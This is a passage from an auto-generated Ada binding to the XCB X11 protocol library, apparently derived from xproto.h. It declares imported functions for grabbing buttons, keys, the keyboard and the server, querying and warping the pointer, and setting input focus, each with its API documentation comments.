that should be displayed or `XCB_NONE` to not change the -- * cursor. -- * @param button A bitmask of #xcb_button_index_t values. -- * @param button \n -- * @param modifiers The modifiers to grab. -- * \n -- * Using the special value `XCB_MOD_MASK_ANY` means grab the pointer with all -- * possible modifier combinations. -- * @return A cookie -- * -- * This request establishes a passive grab. The pointer is actively grabbed as -- * described in GrabPointer, the last-pointer-grab time is set to the time at -- * which the button was pressed (as transmitted in the ButtonPress event), and the -- * ButtonPress event is reported if all of the following conditions are true: -- * -- * The pointer is not grabbed and the specified button is logically pressed when -- * the specified modifier keys are logically down, and no other buttons or -- * modifier keys are logically down. -- * -- * The grab-window contains the pointer. -- * -- * The confine-to window (if any) is viewable. -- * -- * A passive grab on the same button/key combination does not exist on any -- * ancestor of grab-window. -- * -- * The interpretation of the remaining arguments is the same as for GrabPointer. -- * The active grab is terminated automatically when the logical state of the -- * pointer has all buttons released, independent of the logical state of modifier -- * keys. Note that the logical state of a device (as seen by means of the -- * protocol) may lag the physical state if device event processing is frozen. This -- * request overrides all previous passive grabs by the same client on the same -- * button/key combinations on the same window. A modifier of AnyModifier is -- * equivalent to issuing the request for all possible modifier combinations -- * (including the combination of no modifiers). It is not required that all -- * specified modifiers have currently assigned keycodes. A button of AnyButton is -- * equivalent to issuing the request for all possible buttons. Otherwise, it is -- * not required that the button specified currently be assigned to a physical -- * button. -- * -- * An Access error is generated if some other client has already issued a -- * GrabButton request with the same button/key combination on the same window. -- * When using AnyModifier or AnyButton, the request fails completely (no grabs are -- * established), and an Access error is generated if there is a conflicting grab -- * for any combination. The request has no effect on an active grab. -- * -- function xcb_grab_button (c : access xcb.xcb_connection_t; owner_events : bits_stdint_uintn_h.uint8_t; grab_window : xcb_window_t; event_mask : bits_stdint_uintn_h.uint16_t; pointer_mode : bits_stdint_uintn_h.uint8_t; keyboard_mode : bits_stdint_uintn_h.uint8_t; confine_to : xcb_window_t; cursor : xcb_cursor_t; button : bits_stdint_uintn_h.uint8_t; modifiers : bits_stdint_uintn_h.uint16_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:7602 with Import => True, Convention => C, External_Name => "xcb_grab_button"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_ungrab_button_checked (c : access xcb.xcb_connection_t; button : bits_stdint_uintn_h.uint8_t; grab_window : xcb_window_t; modifiers : bits_stdint_uintn_h.uint16_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:7625 with Import => True, Convention => C, External_Name => "xcb_ungrab_button_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_ungrab_button (c : access xcb.xcb_connection_t; button : bits_stdint_uintn_h.uint8_t; grab_window : xcb_window_t; modifiers : bits_stdint_uintn_h.uint16_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:7639 with Import => True, Convention => C, External_Name => "xcb_ungrab_button"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_change_active_pointer_grab_checked (c : access xcb.xcb_connection_t; cursor : xcb_cursor_t; time : xcb_timestamp_t; event_mask : bits_stdint_uintn_h.uint16_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:7656 with Import => True, Convention => C, External_Name => "xcb_change_active_pointer_grab_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_change_active_pointer_grab (c : access xcb.xcb_connection_t; cursor : xcb_cursor_t; time : xcb_timestamp_t; event_mask : bits_stdint_uintn_h.uint16_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:7670 with Import => True, Convention => C, External_Name => "xcb_change_active_pointer_grab"; --* -- * @brief Grab the keyboard -- * -- * @param c The connection -- * @param owner_events If 1, the \a grab_window will still get the pointer events. If 0, events are not -- * reported to the \a grab_window. -- * @param grab_window Specifies the window on which the pointer should be grabbed. -- * @param time Timestamp to avoid race conditions when running X over the network. -- * \n -- * The special value `XCB_CURRENT_TIME` will be replaced with the current server -- * time. -- * @param pointer_mode A bitmask of #xcb_grab_mode_t values. -- * @param pointer_mode \n -- * @param keyboard_mode A bitmask of #xcb_grab_mode_t values. -- * @param keyboard_mode \n -- * @return A cookie -- * -- * Actively grabs control of the keyboard and generates FocusIn and FocusOut -- * events. Further key events are reported only to the grabbing client. -- * -- * Any active keyboard grab by this client is overridden. If the keyboard is -- * actively grabbed by some other client, `AlreadyGrabbed` is returned. If -- * \a grab_window is not viewable, `GrabNotViewable` is returned. If the keyboard -- * is frozen by an active grab of another client, `GrabFrozen` is returned. If the -- * specified \a time is earlier than the last-keyboard-grab time or later than the -- * current X server time, `GrabInvalidTime` is returned. Otherwise, the -- * last-keyboard-grab time is set to the specified time. -- * -- function xcb_grab_keyboard (c : access xcb.xcb_connection_t; owner_events : bits_stdint_uintn_h.uint8_t; grab_window : xcb_window_t; time : xcb_timestamp_t; pointer_mode : bits_stdint_uintn_h.uint8_t; keyboard_mode : bits_stdint_uintn_h.uint8_t) return xcb_grab_keyboard_cookie_t -- /usr/include/xcb/xproto.h:7705 with Import => True, Convention => C, External_Name => "xcb_grab_keyboard"; --* -- * @brief Grab the keyboard -- * -- * @param c The connection -- * @param owner_events If 1, the \a grab_window will still get the pointer events. If 0, events are not -- * reported to the \a grab_window. -- * @param grab_window Specifies the window on which the pointer should be grabbed. -- * @param time Timestamp to avoid race conditions when running X over the network. -- * \n -- * The special value `XCB_CURRENT_TIME` will be replaced with the current server -- * time. -- * @param pointer_mode A bitmask of #xcb_grab_mode_t values. -- * @param pointer_mode \n -- * @param keyboard_mode A bitmask of #xcb_grab_mode_t values. -- * @param keyboard_mode \n -- * @return A cookie -- * -- * Actively grabs control of the keyboard and generates FocusIn and FocusOut -- * events. Further key events are reported only to the grabbing client. -- * -- * Any active keyboard grab by this client is overridden. If the keyboard is -- * actively grabbed by some other client, `AlreadyGrabbed` is returned. If -- * \a grab_window is not viewable, `GrabNotViewable` is returned. If the keyboard -- * is frozen by an active grab of another client, `GrabFrozen` is returned. If the -- * specified \a time is earlier than the last-keyboard-grab time or later than the -- * current X server time, `GrabInvalidTime` is returned. Otherwise, the -- * last-keyboard-grab time is set to the specified time. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_grab_keyboard_unchecked (c : access xcb.xcb_connection_t; owner_events : bits_stdint_uintn_h.uint8_t; grab_window : xcb_window_t; time : xcb_timestamp_t; pointer_mode : bits_stdint_uintn_h.uint8_t; keyboard_mode : bits_stdint_uintn_h.uint8_t) return xcb_grab_keyboard_cookie_t -- /usr/include/xcb/xproto.h:7745 with Import => True, Convention => C, External_Name => "xcb_grab_keyboard_unchecked"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_grab_keyboard_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_grab_keyboard_reply (c : access xcb.xcb_connection_t; cookie : xcb_grab_keyboard_cookie_t; e : System.Address) return access xcb_grab_keyboard_reply_t -- /usr/include/xcb/xproto.h:7767 with Import => True, Convention => C, External_Name => "xcb_grab_keyboard_reply"; --*< --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_ungrab_keyboard_checked (c : access xcb.xcb_connection_t; time : xcb_timestamp_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:7783 with Import => True, Convention => C, External_Name => "xcb_ungrab_keyboard_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_ungrab_keyboard (c : access xcb.xcb_connection_t; time : xcb_timestamp_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:7795 with Import => True, Convention => C, External_Name => "xcb_ungrab_keyboard"; --* -- * @brief Grab keyboard key(s) -- * -- * @param c The connection -- * @param owner_events If 1, the \a grab_window will still get the pointer events. If 0, events are not -- * reported to the \a grab_window. -- * @param grab_window Specifies the window on which the pointer should be grabbed. -- * @param modifiers The modifiers to grab. -- * \n -- * Using the special value `XCB_MOD_MASK_ANY` means grab the pointer with all -- * possible modifier combinations. -- * @param key The keycode of the key to grab. -- * \n -- * The special value `XCB_GRAB_ANY` means grab any key. -- * @param pointer_mode A bitmask of #xcb_grab_mode_t values. -- * @param pointer_mode \n -- * @param keyboard_mode A bitmask of #xcb_grab_mode_t values. -- * @param keyboard_mode \n -- * @return A cookie -- * -- * Establishes a passive grab on the keyboard. In the future, the keyboard is -- * actively grabbed (as for `GrabKeyboard`), the last-keyboard-grab time is set to -- * the time at which the key was pressed (as transmitted in the KeyPress event), -- * and the KeyPress event is reported if all of the following conditions are true: -- * -- * The keyboard is not grabbed and the specified key (which can itself be a -- * modifier key) is logically pressed when the specified modifier keys are -- * logically down, and no other modifier keys are logically down. -- * -- * Either the grab_window is an ancestor of (or is) the focus window, or the -- * grab_window is a descendant of the focus window and contains the pointer. -- * -- * A passive grab on the same key combination does not exist on any ancestor of -- * grab_window. -- * -- * The interpretation of the remaining arguments is as for XGrabKeyboard. The active grab is terminated -- * automatically when the logical state of the keyboard has the specified key released (independent of the -- * logical state of the modifier keys), at which point a KeyRelease event is reported to the grabbing window. -- * -- * Note that the logical state of a device (as seen by client applications) may lag the physical state if -- * device event processing is frozen. -- * -- * A modifiers argument of AnyModifier is equivalent to issuing the request for all possible modifier combinations (including the combination of no modifiers). It is not required that all modifiers specified -- * have currently assigned KeyCodes. A keycode argument of AnyKey is equivalent to issuing the request for -- * all possible KeyCodes. Otherwise, the specified keycode must be in the range specified by min_keycode -- * and max_keycode in the connection setup, or a BadValue error results. -- * -- * If some other client has issued a XGrabKey with the same key combination on the same window, a BadAccess -- * error results. When using AnyModifier or AnyKey, the request fails completely, and a BadAccess error -- * results (no grabs are established) if there is a conflicting grab for any combination. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_grab_key_checked (c : access xcb.xcb_connection_t; owner_events : bits_stdint_uintn_h.uint8_t; grab_window : xcb_window_t; modifiers : bits_stdint_uintn_h.uint16_t; key : xcb_keycode_t; pointer_mode : bits_stdint_uintn_h.uint8_t; keyboard_mode : bits_stdint_uintn_h.uint8_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:7854 with Import => True, Convention => C, External_Name => "xcb_grab_key_checked"; --* -- * @brief Grab keyboard key(s) -- * -- * @param c The connection -- * @param owner_events If 1, the \a grab_window will still get the pointer events. If 0, events are not -- * reported to the \a grab_window. -- * @param grab_window Specifies the window on which the pointer should be grabbed. -- * @param modifiers The modifiers to grab. -- * \n -- * Using the special value `XCB_MOD_MASK_ANY` means grab the pointer with all -- * possible modifier combinations. -- * @param key The keycode of the key to grab. -- * \n -- * The special value `XCB_GRAB_ANY` means grab any key. -- * @param pointer_mode A bitmask of #xcb_grab_mode_t values. -- * @param pointer_mode \n -- * @param keyboard_mode A bitmask of #xcb_grab_mode_t values. -- * @param keyboard_mode \n -- * @return A cookie -- * -- * Establishes a passive grab on the keyboard. In the future, the keyboard is -- * actively grabbed (as for `GrabKeyboard`), the last-keyboard-grab time is set to -- * the time at which the key was pressed (as transmitted in the KeyPress event), -- * and the KeyPress event is reported if all of the following conditions are true: -- * -- * The keyboard is not grabbed and the specified key (which can itself be a -- * modifier key) is logically pressed when the specified modifier keys are -- * logically down, and no other modifier keys are logically down. -- * -- * Either the grab_window is an ancestor of (or is) the focus window, or the -- * grab_window is a descendant of the focus window and contains the pointer. -- * -- * A passive grab on the same key combination does not exist on any ancestor of -- * grab_window. -- * -- * The interpretation of the remaining arguments is as for XGrabKeyboard. The active grab is terminated -- * automatically when the logical state of the keyboard has the specified key released (independent of the -- * logical state of the modifier keys), at which point a KeyRelease event is reported to the grabbing window. -- * -- * Note that the logical state of a device (as seen by client applications) may lag the physical state if -- * device event processing is frozen. -- * -- * A modifiers argument of AnyModifier is equivalent to issuing the request for all possible modifier combinations (including the combination of no modifiers). It is not required that all modifiers specified -- * have currently assigned KeyCodes. A keycode argument of AnyKey is equivalent to issuing the request for -- * all possible KeyCodes. Otherwise, the specified keycode must be in the range specified by min_keycode -- * and max_keycode in the connection setup, or a BadValue error results. -- * -- * If some other client has issued a XGrabKey with the same key combination on the same window, a BadAccess -- * error results. When using AnyModifier or AnyKey, the request fails completely, and a BadAccess error -- * results (no grabs are established) if there is a conflicting grab for any combination. -- * -- function xcb_grab_key (c : access xcb.xcb_connection_t; owner_events : bits_stdint_uintn_h.uint8_t; grab_window : xcb_window_t; modifiers : bits_stdint_uintn_h.uint16_t; key : xcb_keycode_t; pointer_mode : bits_stdint_uintn_h.uint8_t; keyboard_mode : bits_stdint_uintn_h.uint8_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:7915 with Import => True, Convention => C, External_Name => "xcb_grab_key"; --* -- * @brief release a key combination -- * -- * @param c The connection -- * @param key The keycode of the specified key combination. -- * \n -- * Using the special value `XCB_GRAB_ANY` means releasing all possible key codes. -- * @param grab_window The window on which the grabbed key combination will be released. -- * @param modifiers The modifiers of the specified key combination. -- * \n -- * Using the special value `XCB_MOD_MASK_ANY` means releasing the key combination -- * with every possible modifier combination. -- * @return A cookie -- * -- * Releases the key combination on \a grab_window if you grabbed it using -- * `xcb_grab_key` before. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_ungrab_key_checked (c : access xcb.xcb_connection_t; key : xcb_keycode_t; grab_window : xcb_window_t; modifiers : bits_stdint_uintn_h.uint16_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:7945 with Import => True, Convention => C, External_Name => "xcb_ungrab_key_checked"; --* -- * @brief release a key combination -- * -- * @param c The connection -- * @param key The keycode of the specified key combination. -- * \n -- * Using the special value `XCB_GRAB_ANY` means releasing all possible key codes. -- * @param grab_window The window on which the grabbed key combination will be released. -- * @param modifiers The modifiers of the specified key combination. -- * \n -- * Using the special value `XCB_MOD_MASK_ANY` means releasing the key combination -- * with every possible modifier combination. -- * @return A cookie -- * -- * Releases the key combination on \a grab_window if you grabbed it using -- * `xcb_grab_key` before. -- * -- function xcb_ungrab_key (c : access xcb.xcb_connection_t; key : xcb_keycode_t; grab_window : xcb_window_t; modifiers : bits_stdint_uintn_h.uint16_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:7969 with Import => True, Convention => C, External_Name => "xcb_ungrab_key"; --* -- * @brief release queued events -- * -- * @param c The connection -- * @param mode A bitmask of #xcb_allow_t values. -- * @param mode \n -- * @param time Timestamp to avoid race conditions when running X over the network. -- * \n -- * The special value `XCB_CURRENT_TIME` will be replaced with the current server -- * time. -- * @return A cookie -- * -- * Releases queued events if the client has caused a device (pointer/keyboard) to -- * freeze due to grabbing it actively. This request has no effect if \a time is -- * earlier than the last-grab time of the most recent active grab for this client -- * or if \a time is later than the current X server time. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_allow_events_checked (c : access xcb.xcb_connection_t; mode : bits_stdint_uintn_h.uint8_t; time : xcb_timestamp_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:7996 with Import => True, Convention => C, External_Name => "xcb_allow_events_checked"; --* -- * @brief release queued events -- * -- * @param c The connection -- * @param mode A bitmask of #xcb_allow_t values. -- * @param mode \n -- * @param time Timestamp to avoid race conditions when running X over the network. -- * \n -- * The special value `XCB_CURRENT_TIME` will be replaced with the current server -- * time. -- * @return A cookie -- * -- * Releases queued events if the client has caused a device (pointer/keyboard) to -- * freeze due to grabbing it actively. This request has no effect if \a time is -- * earlier than the last-grab time of the most recent active grab for this client -- * or if \a time is later than the current X server time. -- * -- function xcb_allow_events (c : access xcb.xcb_connection_t; mode : bits_stdint_uintn_h.uint8_t; time : xcb_timestamp_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:8019 with Import => True, Convention => C, External_Name => "xcb_allow_events"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_grab_server_checked (c : access xcb.xcb_connection_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:8035 with Import => True, Convention => C, External_Name => "xcb_grab_server_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_grab_server (c : access xcb.xcb_connection_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:8046 with Import => True, Convention => C, External_Name => "xcb_grab_server"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_ungrab_server_checked (c : access xcb.xcb_connection_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:8060 with Import => True, Convention => C, External_Name => "xcb_ungrab_server_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_ungrab_server (c : access xcb.xcb_connection_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:8071 with Import => True, Convention => C, External_Name => "xcb_ungrab_server"; --* -- * @brief get pointer coordinates -- * -- * @param c The connection -- * @param window A window to check if the pointer is on the same screen as \a window (see the -- * `same_screen` field in the reply). -- * @return A cookie -- * -- * Gets the root window the pointer is logically on and the pointer coordinates -- * relative to the root window's origin. -- * -- function xcb_query_pointer (c : access xcb.xcb_connection_t; window : xcb_window_t) return xcb_query_pointer_cookie_t -- /usr/include/xcb/xproto.h:8086 with Import => True, Convention => C, External_Name => "xcb_query_pointer"; --* -- * @brief get pointer coordinates -- * -- * @param c The connection -- * @param window A window to check if the pointer is on the same screen as \a window (see the -- * `same_screen` field in the reply). -- * @return A cookie -- * -- * Gets the root window the pointer is logically on and the pointer coordinates -- * relative to the root window's origin. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_query_pointer_unchecked (c : access xcb.xcb_connection_t; window : xcb_window_t) return xcb_query_pointer_cookie_t -- /usr/include/xcb/xproto.h:8105 with Import => True, Convention => C, External_Name => "xcb_query_pointer_unchecked"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_query_pointer_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_query_pointer_reply (c : access xcb.xcb_connection_t; cookie : xcb_query_pointer_cookie_t; e : System.Address) return access xcb_query_pointer_reply_t -- /usr/include/xcb/xproto.h:8123 with Import => True, Convention => C, External_Name => "xcb_query_pointer_reply"; --*< --* -- * Get the next element of the iterator -- * @param i Pointer to a xcb_timecoord_iterator_t -- * -- * Get the next element in the iterator. The member rem is -- * decreased by one. The member data points to the next -- * element. The member index is increased by sizeof(xcb_timecoord_t) -- procedure xcb_timecoord_next (i : access xcb_timecoord_iterator_t) -- /usr/include/xcb/xproto.h:8136 with Import => True, Convention => C, External_Name => "xcb_timecoord_next"; --* -- * Return the iterator pointing to the last element -- * @param i An xcb_timecoord_iterator_t -- * @return The iterator pointing to the last element -- * -- * Set the current element in the iterator to the last element. -- * The member rem is set to 0. The member data points to the -- * last element. -- function xcb_timecoord_end (i : xcb_timecoord_iterator_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:8148 with Import => True, Convention => C, External_Name => "xcb_timecoord_end"; function xcb_get_motion_events_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:8151 with Import => True, Convention => C, External_Name => "xcb_get_motion_events_sizeof"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_get_motion_events (c : access xcb.xcb_connection_t; window : xcb_window_t; start : xcb_timestamp_t; stop : xcb_timestamp_t) return xcb_get_motion_events_cookie_t -- /usr/include/xcb/xproto.h:8162 with Import => True, Convention => C, External_Name => "xcb_get_motion_events"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_get_motion_events_unchecked (c : access xcb.xcb_connection_t; window : xcb_window_t; start : xcb_timestamp_t; stop : xcb_timestamp_t) return xcb_get_motion_events_cookie_t -- /usr/include/xcb/xproto.h:8179 with Import => True, Convention => C, External_Name => "xcb_get_motion_events_unchecked"; function xcb_get_motion_events_events (R : access constant xcb_get_motion_events_reply_t) return access xcb_timecoord_t -- /usr/include/xcb/xproto.h:8185 with Import => True, Convention => C, External_Name => "xcb_get_motion_events_events"; function xcb_get_motion_events_events_length (R : access constant xcb_get_motion_events_reply_t) return int -- /usr/include/xcb/xproto.h:8188 with Import => True, Convention => C, External_Name => "xcb_get_motion_events_events_length"; function xcb_get_motion_events_events_iterator (R : access constant xcb_get_motion_events_reply_t) return xcb_timecoord_iterator_t -- /usr/include/xcb/xproto.h:8191 with Import => True, Convention => C, External_Name => "xcb_get_motion_events_events_iterator"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_get_motion_events_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_get_motion_events_reply (c : access xcb.xcb_connection_t; cookie : xcb_get_motion_events_cookie_t; e : System.Address) return access xcb_get_motion_events_reply_t -- /usr/include/xcb/xproto.h:8208 with Import => True, Convention => C, External_Name => "xcb_get_motion_events_reply"; --*< --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_translate_coordinates (c : access xcb.xcb_connection_t; src_window : xcb_window_t; dst_window : xcb_window_t; src_x : bits_stdint_intn_h.int16_t; src_y : bits_stdint_intn_h.int16_t) return xcb_translate_coordinates_cookie_t -- /usr/include/xcb/xproto.h:8221 with Import => True, Convention => C, External_Name => "xcb_translate_coordinates"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_translate_coordinates_unchecked (c : access xcb.xcb_connection_t; src_window : xcb_window_t; dst_window : xcb_window_t; src_x : bits_stdint_intn_h.int16_t; src_y : bits_stdint_intn_h.int16_t) return xcb_translate_coordinates_cookie_t -- /usr/include/xcb/xproto.h:8239 with Import => True, Convention => C, External_Name => "xcb_translate_coordinates_unchecked"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_translate_coordinates_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_translate_coordinates_reply (c : access xcb.xcb_connection_t; cookie : xcb_translate_coordinates_cookie_t; e : System.Address) return access xcb_translate_coordinates_reply_t -- /usr/include/xcb/xproto.h:8260 with Import => True, Convention => C, External_Name => "xcb_translate_coordinates_reply"; --*< --* -- * @brief move mouse pointer -- * -- * @param c The connection -- * @param src_window If \a src_window is not `XCB_NONE` (TODO), the move will only take place if the -- * pointer is inside \a src_window and within the rectangle specified by (\a src_x, -- * \a src_y, \a src_width, \a src_height). The rectangle coordinates are relative to -- * \a src_window. -- * @param dst_window If \a dst_window is not `XCB_NONE` (TODO), the pointer will be moved to the -- * offsets (\a dst_x, \a dst_y) relative to \a dst_window. If \a dst_window is -- * `XCB_NONE` (TODO), the pointer will be moved by the offsets (\a dst_x, \a dst_y) -- * relative to the current position of the pointer. -- * @return A cookie -- * -- * Moves the mouse pointer to the specified position. -- * -- * If \a src_window is not `XCB_NONE` (TODO), the move will only take place if the -- * pointer is inside \a src_window and within the rectangle specified by (\a src_x, -- * \a src_y, \a src_width, \a src_height). The rectangle coordinates are relative to -- * \a src_window. -- * -- * If \a dst_window is not `XCB_NONE` (TODO), the pointer will be moved to the -- * offsets (\a dst_x, \a dst_y) relative to \a dst_window. If \a dst_window is -- * `XCB_NONE` (TODO), the pointer will be moved by the offsets (\a dst_x, \a dst_y) -- * relative to the current position of the pointer. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_warp_pointer_checked (c : access xcb.xcb_connection_t; src_window : xcb_window_t; dst_window : xcb_window_t; src_x : bits_stdint_intn_h.int16_t; src_y : bits_stdint_intn_h.int16_t; src_width : bits_stdint_uintn_h.uint16_t; src_height : bits_stdint_uintn_h.uint16_t; dst_x : bits_stdint_intn_h.int16_t; dst_y : bits_stdint_intn_h.int16_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:8295 with Import => True, Convention => C, External_Name => "xcb_warp_pointer_checked"; --* -- * @brief move mouse pointer -- * -- * @param c The connection -- * @param src_window If \a src_window is not `XCB_NONE` (TODO), the move will only take place if the -- * pointer is inside \a src_window and within the rectangle specified by (\a src_x, -- * \a src_y, \a src_width, \a src_height). The rectangle coordinates are relative to -- * \a src_window. -- * @param dst_window If \a dst_window is not `XCB_NONE` (TODO), the pointer will be moved to the -- * offsets (\a dst_x, \a dst_y) relative to \a dst_window. If \a dst_window is -- * `XCB_NONE` (TODO), the pointer will be moved by the offsets (\a dst_x, \a dst_y) -- * relative to the current position of the pointer. -- * @return A cookie -- * -- * Moves the mouse pointer to the specified position. -- * -- * If \a src_window is not `XCB_NONE` (TODO), the move will only take place if the -- * pointer is inside \a src_window and within the rectangle specified by (\a src_x, -- * \a src_y, \a src_width, \a src_height). The rectangle coordinates are relative to -- * \a src_window. -- * -- * If \a dst_window is not `XCB_NONE` (TODO), the pointer will be moved to the -- * offsets (\a dst_x, \a dst_y) relative to \a dst_window. If \a dst_window is -- * `XCB_NONE` (TODO), the pointer will be moved by the offsets (\a dst_x, \a dst_y) -- * relative to the current position of the pointer. -- * -- function xcb_warp_pointer (c : access xcb.xcb_connection_t; src_window : xcb_window_t; dst_window : xcb_window_t; src_x : bits_stdint_intn_h.int16_t; src_y : bits_stdint_intn_h.int16_t; src_width : bits_stdint_uintn_h.uint16_t; src_height : bits_stdint_uintn_h.uint16_t; dst_x : bits_stdint_intn_h.int16_t; dst_y : bits_stdint_intn_h.int16_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:8333 with Import => True, Convention => C, External_Name => "xcb_warp_pointer"; --* -- * @brief Sets input focus -- * -- * @param c The connection -- * @param revert_to A bitmask of #xcb_input_focus_t values. -- * @param revert_to Specifies what happens when the \a focus window becomes unviewable (if \a focus -- * is neither `XCB_NONE` nor `XCB_POINTER_ROOT`). -- * @param focus The window to focus. All keyboard events will be reported to this window. The -- * window must be viewable (TODO), or a `xcb_match_error_t` occurs (TODO). -- * \n -- * If \a focus is `XCB_NONE` (TODO), all keyboard events are -- * discarded until a new focus window is set. -- * \n -- * If \a focus is `XCB_POINTER_ROOT` (TODO), focus is on the root window of the -- * screen on which the pointer is on currently. -- * @param time Timestamp to avoid race conditions when running X over the network. -- * \n -- * The special value `XCB_CURRENT_TIME` will be replaced with the current server -- * time. -- * @return A cookie -- * -- * Changes the input focus and the last-focus-change time. If the specified \a time -- * is earlier than the current last-focus-change time, the request is ignored (to -- * avoid race conditions when running X over the network). -- * -- * A FocusIn and FocusOut event is generated when focus is changed. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_set_input_focus_checked (c : access xcb.xcb_connection_t; revert_to : bits_stdint_uintn_h.uint8_t; focus : xcb_window_t; time : xcb_timestamp_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:8375 with Import => True, Convention => C, External_Name => "xcb_set_input_focus_checked"; --* -- * @brief Sets input focus -- * -- * @param c The connection -- * @param revert_to A bitmask of #xcb_input_focus_t values. -- * @param revert_to Specifies what happens when the \a focus window becomes unviewable (if \a focus -- * is neither `XCB_NONE` nor `XCB_POINTER_ROOT`). -- * @param focus The window to focus. All keyboard events will be reported to this window. The -- * window must be viewable (TODO), or a `xcb_match_error_t` occurs (TODO). -- * \n -- * If \a focus is `XCB_NONE` (TODO), all keyboard events are -- * discarded until a new focus window is set. -- * \n -- * If \a focus is `XCB_POINTER_ROOT` (TODO), focus is on the root window of the -- * screen on which the pointer is on currently. -- * @param time Timestamp to avoid race conditions when running X over the network. -- * \n -- * The special value `XCB_CURRENT_TIME` will be replaced with the current server -- * time. -- * @return A cookie -- * -- * Changes the input focus and the last-focus-change time. If the specified \a time -- * is earlier than the current last-focus-change time, the request is ignored (to -- * avoid race conditions when running X over the network). -- * -- * A FocusIn and FocusOut event is generated when focus is changed. -- * -- function xcb_set_input_focus (c : access xcb.xcb_connection_t; revert_to : bits_stdint_uintn_h.uint8_t; focus : xcb_window_t; time : 